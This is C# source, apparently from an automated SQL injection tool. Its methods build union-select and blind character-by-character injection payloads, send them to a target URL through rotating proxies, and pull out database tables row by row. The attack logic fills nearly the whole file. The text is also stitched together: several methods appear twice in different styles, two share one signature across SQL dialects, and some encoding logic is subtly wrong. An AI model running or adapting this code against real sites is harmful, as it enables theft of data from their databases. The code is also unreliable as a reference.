    // }}}

    // {{{ SelectValueForGivenPrimaryKey
    /// <summary>
    /// Builds the statement text
    /// <c>SELECT TOP 1 &lt;FieldName&gt; FROM &lt;TableName&gt; WHERE &lt;pk.Name&gt;=&lt;pk.Value&gt;</c>.
    /// </summary>
    /// <param name="FieldName">Column to read; spliced into the text verbatim.</param>
    /// <param name="TableName">Table to read from; spliced into the text verbatim.</param>
    /// <param name="pk">Key column name and value for the WHERE clause. The value is neither quoted nor escaped here.</param>
    /// <returns>The assembled statement.</returns>
    public string SelectValueForGivenPrimaryKey(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
    {
        // Every argument is concatenated unchanged, so the caller owns the shape of each piece.
        string rowFilter = pk.Name + "=" + pk.Value;

        return string.Concat("SELECT TOP 1 ", FieldName, " FROM ", TableName, " WHERE ", rowFilter);
    }
        /// <summary>
        /// Advances the row cursor over <paramref name="TableName"/>: requests the smallest value of
        /// <paramref name="KeyName"/> above the current key (or the overall minimum when no cursor for this
        /// column exists yet) and returns it as the next primary key.
        /// </summary>
        /// <param name="TableName">Table whose key column is walked.</param>
        /// <param name="KeyName">Name of the primary-key column.</param>
        /// <param name="CurrentPrimaryKey">Cursor returned by the previous call; only honoured when its Name equals <paramref name="KeyName"/>.</param>
        /// <param name="PrimaryKeyType">Declared type of the key column; selects how the value is re-encoded for later WHERE clauses.</param>
        /// <returns>
        /// A PrimaryKey whose Value is the re-encoded key (used in subsequent statements) and whose
        /// OutputValue is the raw text parsed from the response.
        /// </returns>
        private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
        {
            StringBuilder WhereClause = new StringBuilder();

            // No lower bound on the first call (the cursor still names a different column or none).
            if (CurrentPrimaryKey.Name == KeyName)
            {
                WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
            }

            // The selected value is wrapped in char(58) (':') on both sides so it can be found in the page text.
            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

            // One HTTP request per cursor advance; the response is parsed for the delimited value.
            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

            // Drop the two ':' delimiters. Throws if the parser returned fewer than two characters.
            ResultText = ResultText.Substring(1, ResultText.Length - 2);

            string WorkingText = "";

            switch (PrimaryKeyType)
            {
            case SqlDbType.VarChar:
            case SqlDbType.Char:
            case SqlDbType.NChar:
            case SqlDbType.NText:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
                // Character keys are re-encoded as a "char(n) + char(n) + ..." expression, one term per
                // character of the raw text, via Char.GetNumericValue.
                StringBuilder ElementBuilder = new StringBuilder();

                //split
                char[] TextElements = ResultText.ToCharArray();
                for (int i = 0; i < TextElements.Length; i++)
                {
                    ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
                }
                // NOTE(review): Remove with a negative start throws when ResultText is empty (nothing was appended).
                ElementBuilder.Remove(ElementBuilder.Length - 2, 2);                       // remove trailing '+ '

                WorkingText = ElementBuilder.ToString();
                break;

            default:
                // Any other type: the trimmed raw text is used as-is in later statements.
                WorkingText = ResultText.Trim();
                break;
            }



            GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
            retVal.Name        = KeyName;
            retVal.Value       = WorkingText;
            retVal.OutputValue = ResultText;

            return(retVal);
        }
        // }}}

        // {{{ GetRecord
        /// <summary>
        /// Assembles one row: fetches every column in <paramref name="Columns"/> for the row selected by
        /// <paramref name="pk"/> and collects the results keyed by column name.
        /// </summary>
        /// <param name="TableName">Table to read from.</param>
        /// <param name="Columns">Columns to fetch, in the order they are requested.</param>
        /// <param name="pk">Primary-key name/value identifying the row.</param>
        /// <returns>Column name → value pairs, one entry per element of <paramref name="Columns"/>.</returns>
        private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk)
        {
            Hashtable row = new Hashtable();

            // Hashtable.Add throws on a repeated key, so a column listed twice is rejected rather than overwritten.
            foreach (GlobalDS.Field column in Columns)
            {
                DictionaryEntry entry = GetFieldData(TableName, column, pk);
                row.Add(entry.Key, entry.Value);
            }

            return row;
        }
        // }}}

        // {{{ PullDataFromIndividualTable
        /// <summary>
        /// Pulls every row of <paramref name="SrcTable"/> one record at a time, walking the table's primary
        /// key, and writes each record to <paramref name="xOutput"/> as it is retrieved.
        /// </summary>
        /// <param name="SrcTable">Table descriptor (name, field list, record count).</param>
        /// <param name="ColumnIDs">Positions within SrcTable.FieldList of the columns to pull.</param>
        /// <param name="xOutput">XML writer that receives one DataRecord element per row.</param>
        /// <returns>The pulled records, in retrieval order; empty when no field is flagged as primary.</returns>
        private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
        {
            List <Hashtable>    records         = new List <Hashtable>();
            GlobalDS.Field[]    selectedColumns = new GlobalDS.Field[ColumnIDs.Length];
            GlobalDS.PrimaryKey cursor          = new GlobalDS.PrimaryKey();
            int                 selectedCount   = 0;
            string              keyName         = String.Empty;
            SqlDbType           keyType         = SqlDbType.Int;

            UserStatus($"Individual Pulling {SrcTable.Name}");

            // Pass 1: collect the requested columns by position and remember the (last) field flagged as primary.
            for (long position = 0; position < SrcTable.FieldList.Length; position++)
            {
                GlobalDS.Field field = SrcTable.FieldList[position];

                UserStatus($"Going for Field: {field.FieldName}");

                if (Array.IndexOf(ColumnIDs, position) >= 0)
                {
                    selectedColumns[selectedCount] = field;
                    selectedCount++;
                }

                if (field.IsPrimary)
                {
                    keyName = field.FieldName;
                    keyType = field.DataType;
                }
            }

            // Pass 2: without a primary key the rows cannot be walked individually, so nothing is pulled.
            if (keyName.Length > 0)
            {
                for (long row = 0; row < SrcTable.RecordCount; row++)
                {
                    cursor = IteratePrimaryKey(SrcTable.Name, keyName, cursor, keyType);
                    Hashtable record = GetRecord(SrcTable.Name, selectedColumns, cursor);
                    records.Add(record);
                    OutputRecordToFile(ref xOutput, record, cursor);
                }
            }

            return records;
        }
    // }}}

    // {{{ SelectCharacterValueForConvertedRecordValue
    /// <summary>
    /// Builds a statement returning the ASCII code of the character at position <paramref name="Index"/>
    /// (as SUBSTRING counts it) of <paramref name="FieldName"/> converted to VarChar, for the row selected
    /// by <paramref name="pk"/>.
    /// </summary>
    /// <param name="Index">Character position handed to SUBSTRING.</param>
    /// <param name="FieldName">Column to read; spliced in verbatim.</param>
    /// <param name="TableName">Table to read from; spliced in verbatim.</param>
    /// <param name="pk">Key column name and value for the WHERE clause; the value is not quoted or escaped here.</param>
    /// <returns>The assembled statement.</returns>
    public string SelectCharacterValueForConvertedRecordValue(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
    {
        // Note the spaces around "=" in the row filter; sibling builders in this file omit them.
        string characterExpression = $"ASCII(SUBSTRING(CONVERT(VarChar,{FieldName}),{Index},1))";

        return $"SELECT {characterExpression} FROM {TableName} WHERE {pk.Name} = {pk.Value}";
    }
    // }}}

    // {{{ SelectLengthOfConvertedRecordValue
    /// <summary>
    /// Builds a statement returning <c>LENGTH(CONVERT(VarChar, FieldName))</c> for the first row matching
    /// <paramref name="pk"/> (TOP 1).
    /// </summary>
    /// <param name="FieldName">Column to measure; spliced in verbatim.</param>
    /// <param name="TableName">Table to read from; spliced in verbatim.</param>
    /// <param name="pk">Key column name and value for the WHERE clause; the value is not quoted or escaped here.</param>
    /// <returns>The assembled statement.</returns>
    public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
    {
        string lengthExpression = "LENGTH(CONVERT(VarChar," + FieldName + "))";
        string rowFilter        = pk.Name + "=" + pk.Value;

        return "SELECT TOP 1 " + lengthExpression + " FROM " + TableName + " WHERE " + rowFilter;
    }
    // }}}

    // {{{ SelectCharacterValueForGivenPrimaryKey
    /// <summary>
    /// Builds a statement returning the ASCII code of the character at position <paramref name="Index"/>
    /// (as SUBSTR counts it) of <paramref name="FieldName"/> for the row selected by <paramref name="pk"/>.
    /// </summary>
    /// <param name="Index">Character position handed to SUBSTR.</param>
    /// <param name="FieldName">Column to read; spliced in verbatim.</param>
    /// <param name="TableName">Table to read from; spliced in verbatim.</param>
    /// <param name="pk">Key column name and value for the WHERE clause; the value is not quoted or escaped here.</param>
    /// <returns>The assembled statement.</returns>
    public string SelectCharacterValueForGivenPrimaryKey(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
    {
        string characterExpression = $"ASCII(SUBSTR({FieldName},{Index},1))";
        string rowFilter           = $"{pk.Name}={pk.Value}";

        return $"SELECT {characterExpression} FROM {TableName} WHERE {rowFilter}";
    }
    // }}}

    // {{{ SelectLengthOfConvertedRecordValue
    /// <summary>
    /// Builds a statement returning <c>LENGTH(TO_CHAR(FieldName))</c> for the row selected by
    /// <paramref name="pk"/>, limited to one row with <c>ROWNUM=1</c> (the TO_CHAR/ROWNUM forms suggest an
    /// Oracle-style dialect; the sibling builder uses TOP 1/CONVERT instead).
    /// </summary>
    /// <param name="FieldName">Column to measure; spliced in verbatim.</param>
    /// <param name="TableName">Table to read from; spliced in verbatim.</param>
    /// <param name="pk">Key column name and value for the WHERE clause; the value is not quoted or escaped here.</param>
    /// <returns>The assembled statement.</returns>
    public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
    {
        string lengthExpression = $"LENGTH(TO_CHAR({FieldName}))";
        string rowFilter        = $"ROWNUM=1 AND {pk.Name}={pk.Value}";

        return $"SELECT {lengthExpression} FROM {TableName} WHERE {rowFilter}";
    }
        // }}}

        // {{{ GetFieldData
        /// <summary>
        /// Retrieves the value of one column for the row identified by <paramref name="pk"/> and returns it
        /// as a (column name, value) pair. The key column itself is answered from <paramref name="pk"/>
        /// without issuing a request.
        /// </summary>
        /// <param name="TableName">Table to read from.</param>
        /// <param name="Column">Column descriptor; FieldName and DataType are used.</param>
        /// <param name="pk">Primary-key name and value selecting the row.</param>
        /// <returns>
        /// Key = Column.FieldName; Value = pk.Value for the key column, otherwise the text found between the
        /// ':' delimiters of the parsed response.
        /// </returns>
        private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
        {
            DictionaryEntry retVal = new DictionaryEntry();

            retVal.Key   = Column.FieldName;
            retVal.Value = string.Empty;

            // The key value is already known from the cursor; no request needed.
            if (Column.FieldName.Equals(pk.Name))
            {
                retVal.Value = pk.Value;
                return(retVal);
            }

            StringBuilder SelectClause = new StringBuilder();


            // All supported types use the same expression: the column converted to nvarchar and wrapped in
            // char(58) (':') on both sides so the value can be located in the page text. There is no default
            // case, so any type not listed here (and the binary types below) leaves SelectClause empty.
            switch (Column.DataType)
            {
            case SqlDbType.BigInt:
            case SqlDbType.SmallInt:
            case SqlDbType.TinyInt:
            case SqlDbType.Int:
            case SqlDbType.Decimal:
            case SqlDbType.DateTime:
            case SqlDbType.Money:
            case SqlDbType.Float:
            case SqlDbType.Real:
            case SqlDbType.SmallDateTime:
            case SqlDbType.SmallMoney:
            case SqlDbType.Timestamp:
            case SqlDbType.UniqueIdentifier:
                //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");

                break;

            case SqlDbType.NChar:
            case SqlDbType.Char:
            case SqlDbType.NVarChar:
            case SqlDbType.Text:
            case SqlDbType.NText:
            case SqlDbType.VarChar:
                //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Bit:
                //retVal.Value = GetBitField(Column.FieldName, TableName, pk);
                SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
                break;

            case SqlDbType.Image:
            case SqlDbType.Binary:
            case SqlDbType.VarBinary:
                // TODO: Figure out how to support this!
                // NOTE(review): nothing is appended here, yet the request below is still sent with an empty
                // select expression and its response is still parsed.
                //retVal.Value = null;
                break;
            }

            _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);


            // One HTTP request per column per row.
            string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
            string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);

            // Drop the two ':' delimiters. Throws if the parser returned fewer than two characters.
            retVal.Value = ResultText.Substring(1, ResultText.Length - 2);

            return(retVal);
        }
        /// <summary>
        /// Appends one <c>DataRecord</c> element to <paramref name="xOutput"/>: the key column name and its
        /// display value as attributes, then one child element per entry of <paramref name="DataRecord"/>.
        /// </summary>
        /// <param name="xOutput">Writer positioned where the record element belongs.</param>
        /// <param name="DataRecord">Column name → value pairs; each key is used verbatim as an element name.</param>
        /// <param name="pk">Key column whose Name and OutputValue become the PrimaryKey / PrimaryKeyValue attributes.</param>
        private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk)
        {
            xOutput.WriteStartElement("DataRecord");
            xOutput.WriteAttributeString("PrimaryKey", pk.Name);
            xOutput.WriteAttributeString("PrimaryKeyValue", pk.OutputValue);

            // Values are written via ToString(); a null value would throw here.
            foreach (string columnName in DataRecord.Keys)
            {
                xOutput.WriteElementString(columnName, DataRecord[columnName].ToString());
            }

            xOutput.WriteEndElement();
        }
		/// <summary>
		/// Advances the row cursor over <paramref name="TableName"/>: requests the smallest value of
		/// <paramref name="KeyName"/> above the current key (or the overall minimum when no cursor for this
		/// column exists yet) and returns it as the next primary key.
		/// </summary>
		/// <param name="TableName">Table whose key column is walked.</param>
		/// <param name="KeyName">Name of the primary-key column.</param>
		/// <param name="CurrentPrimaryKey">Cursor returned by the previous call; only honoured when its Name equals <paramref name="KeyName"/>.</param>
		/// <param name="PrimaryKeyType">Declared type of the key column; selects how the value is re-encoded for later WHERE clauses.</param>
		/// <returns>
		/// A PrimaryKey whose Value is the re-encoded key (used in subsequent statements) and whose
		/// OutputValue is the raw text parsed from the response.
		/// </returns>
		private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
		{
			StringBuilder WhereClause = new StringBuilder();

			// No lower bound on the first call (the cursor still names a different column or none).
			if (CurrentPrimaryKey.Name == KeyName)
			{
				WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
			}

			// The selected value is wrapped in char(58) (':') on both sides so it can be found in the page text.
			_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());

			// One HTTP request per cursor advance; the response is parsed for the delimited value.
			string ResultPage =  httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
			string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);

			// Drop the two ':' delimiters. Throws if the parser returned fewer than two characters.
			ResultText = ResultText.Substring(1, ResultText.Length-2);

			string WorkingText = "";
			switch(PrimaryKeyType)
			{
				case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText: 
				case SqlDbType.NVarChar: case SqlDbType.Text: 
					// Character keys are re-encoded as a "char(n) + char(n) + ..." expression, one term per
					// character of the raw text, via Char.GetNumericValue.
					StringBuilder ElementBuilder = new StringBuilder();

					//split
					char[] TextElements = ResultText.ToCharArray();
					for (int i=0; i < TextElements.Length; i++)
					{
						ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
					}
					// NOTE(review): Remove with a negative start throws when ResultText is empty (nothing was appended).
					ElementBuilder.Remove(ElementBuilder.Length -2,2); // remove trailing '+ '

					WorkingText = ElementBuilder.ToString();
					break;

				default:
					// Any other type: the trimmed raw text is used as-is in later statements.
					WorkingText = ResultText.Trim();
					break;
			}
				


			GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
			retVal.Name = KeyName;
			retVal.Value = WorkingText;
			retVal.OutputValue = ResultText;

			return retVal;
		}
		// }}}
		
		// {{{ PullDataFromIndividualTable
		/// <summary>
		/// Pulls every row of <paramref name="SrcTable"/> one record at a time, walking the table's primary
		/// key, and writes each record to <paramref name="xOutput"/> as it is retrieved.
		/// </summary>
		/// <param name="SrcTable">Table descriptor (name, field list, record count).</param>
		/// <param name="ColumnIDs">Positions within SrcTable.FieldList of the columns to pull.</param>
		/// <param name="xOutput">XML writer that receives one DataRecord element per row.</param>
		/// <returns>The pulled records, in retrieval order; empty when no field is flagged as primary.</returns>
		private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
		{
			List<Hashtable> records = new List<Hashtable>();
			GlobalDS.Field[] selectedColumns = new GlobalDS.Field[ColumnIDs.Length];
			GlobalDS.PrimaryKey cursor = new GlobalDS.PrimaryKey();
			int selectedCount = 0;
			string keyName = String.Empty;
			SqlDbType keyType = SqlDbType.Int;

			UserStatus($"Individual Pulling {SrcTable.Name}");

			// Pass 1: collect the requested columns by position and remember the (last) field flagged as primary.
			for (long position = 0; position < SrcTable.FieldList.Length; position++)
			{
				GlobalDS.Field field = SrcTable.FieldList[position];

				UserStatus($"Going for Field: {field.FieldName}");

				if (Array.IndexOf(ColumnIDs, position) >= 0)
				{
					selectedColumns[selectedCount] = field;
					selectedCount++;
				}

				if (field.IsPrimary)
				{
					keyName = field.FieldName;
					keyType = field.DataType;
				}
			}

			// Pass 2: without a primary key the rows cannot be walked individually, so nothing is pulled.
			if (keyName.Length > 0)
			{
				for (long row = 0; row < SrcTable.RecordCount; row++)
				{
					cursor = IteratePrimaryKey(SrcTable.Name, keyName, cursor, keyType);
					Hashtable record = GetRecord(SrcTable.Name, selectedColumns, cursor);
					records.Add(record);
					OutputRecordToFile(ref xOutput, record, cursor);
				}
			}

			return records;
		}
		// }}}

		// {{{ IterateIntegerPrimaryKey
		/// <summary>
		/// Produces the next integer primary-key value of <paramref name="TableName"/>: the first key on the
		/// initial call, otherwise the first key above <paramref name="CurrentPrimaryKey"/>.Value.
		/// </summary>
		/// <param name="TableName">Table whose key column is walked.</param>
		/// <param name="KeyName">Name of the primary-key column.</param>
		/// <param name="CurrentPrimaryKey">Cursor from the previous call; only honoured when its Name equals <paramref name="KeyName"/>.</param>
		/// <returns>A PrimaryKey whose Value and OutputValue both hold the decimal text of the key found.</returns>
		private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
		{
			bool haveLowerBound = CurrentPrimaryKey.Name == KeyName;

			// Request vector = the shared buffer followed by the plugin's "AND ... > ..." condition.
			StringBuilder vector = new StringBuilder();
			vector.Append(_VectorBuffer);

			if (haveLowerBound)
			{
				vector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
			}
			else
			{
				vector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName)));
			}

			// Original author's note: "Is there a way to force this to be numeric?!" — the search yields a long
			// whatever the column's declared type is.
			long found = RecursiveSearch(1, 0, vector.ToString());
			string foundText = found.ToString();

			GlobalDS.PrimaryKey next = new GlobalDS.PrimaryKey();
			next.Name        = KeyName;
			next.Value       = foundText;
			next.OutputValue = foundText;

			return next;
		}
		// }}}

		// {{{ IterateNonIntegerPrimaryKey
		/// <summary>
		/// Produces the next non-integer primary-key value of <paramref name="TableName"/>: first the length
		/// of the key (converted to text) is searched, then one search per character position recovers its
		/// character code.
		/// </summary>
		/// <param name="TableName">Table whose key column is walked.</param>
		/// <param name="KeyName">Name of the primary-key column.</param>
		/// <param name="CurrentPrimaryKey">Cursor from the previous call; only honoured when its Name equals <paramref name="KeyName"/>.</param>
		/// <returns>
		/// A PrimaryKey whose Value is the key rebuilt from the plugin's character-conversion function joined by
		/// its concatenation character (for use in later statements) and whose OutputValue is the plain text.
		/// </returns>
		private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
		{
			StringBuilder CurrentVector = new StringBuilder();
			CurrentVector.Append(_VectorBuffer);

			// Step 1: length of the next key. The lower bound is applied only when the cursor already names this column.
			if (CurrentPrimaryKey.Name == KeyName)
			{
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
			}
			else
			{
				CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName)));
			}

			long Size = RecursiveSearch(1,0,CurrentVector.ToString());

			// Step 2: one search per character position, bounded by UNICODE_LIMIT.
			StringBuilder KeyValueBuilder = new StringBuilder();
			StringBuilder KeyOutputValueBuilder = new StringBuilder();
			for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
			{
				CurrentVector = new StringBuilder();
				CurrentVector.Append(_VectorBuffer);

				if (CurrentPrimaryKey.Name == KeyName)
				{
					CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value)));
				}
				else
				{
					CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName)));
				}

				// Value side gets the plugin's char-conversion expression plus separator; output side the literal character.
				// Convert.ToChar(long) throws OverflowException for a code outside the char range.
				long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString());
				KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter);
				KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal));
			}

			// Trim the trailing separator.
			// NOTE(review): when Size is 0 nothing was appended and this Remove throws (negative start index).
			KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length);

			GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
			retVal.Name = KeyName;
			//TODO: We should escape this with apostrophes most likely
			retVal.Value = KeyValueBuilder.ToString();
			retVal.OutputValue = KeyOutputValueBuilder.ToString();


			return retVal;
		}